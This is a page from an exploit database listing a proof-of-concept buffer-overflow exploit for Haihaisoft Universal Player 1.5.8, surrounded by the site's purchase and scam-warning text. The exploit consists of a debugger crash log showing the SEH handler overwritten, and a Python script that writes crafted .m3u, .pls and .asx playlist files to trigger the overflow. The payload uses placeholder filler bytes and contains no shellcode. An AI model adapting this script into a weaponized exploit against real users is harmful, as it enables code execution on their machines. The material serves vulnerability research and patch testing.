0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)
#-----------------------------------------------------------------------------# # Exploit Title: Haihaisoft Universal Player 1.5.8 - Buffer Overflow (SEH) # # Date: Mar 25 2014 # # Exploit Author: Gabor Seljan # # Software Link: http://www.haihaisoft.com/hup.aspx # # Version: 1.5.8.0 # # Tested on: Windows XP SP3 # #-----------------------------------------------------------------------------# # (6ec.57c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=44444444 ecx=0000000f edx=00000000 esi=04bae7d0 edi=44444448 # eip=0069537f esp=04cb7b18 ebp=04cb7b58 iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 # *** ERROR: Module load completed but symbols could not be loaded for mplayerc.exe # mplayerc+0x29537f: # 0069537f f3ab rep stos dword ptr es:[edi] # 0:005> g # (6ec.57c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000 # eip=43434343 esp=04cb7748 ebp=04cb7768 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 # 43434343 ?? ??? # 0:005> !exchain # 04cb775c: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc) # 04cb7b4c: mplayerc+2e2e78 (006e2e78) # 04cb8b80: 43434343 # Invalid exception stack at 42424242 #!/usr/bin/python junk1 = "\x80" * 50; offset = "\x41" * 1591; nSEH = "\x42" * 4; SEH = "\x43" * 4; junk2 = "\x44" * 5000; evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals()) for e in ['m3u', 'pls', 'asx']: if e is 'm3u': poc = evil elif e is 'pls': poc = "[playlist]\nFile1={}".format(evil) else: poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil) try: print("[*] Creating poc.%s file..." % e) f = open('poc.%s' % e, 'w') f.write(poc) f.close() print("[*] %s file successfully created!" % f.name) except: print("[!] Error while creating exploit file!") # 0day.today [2024-07-01] #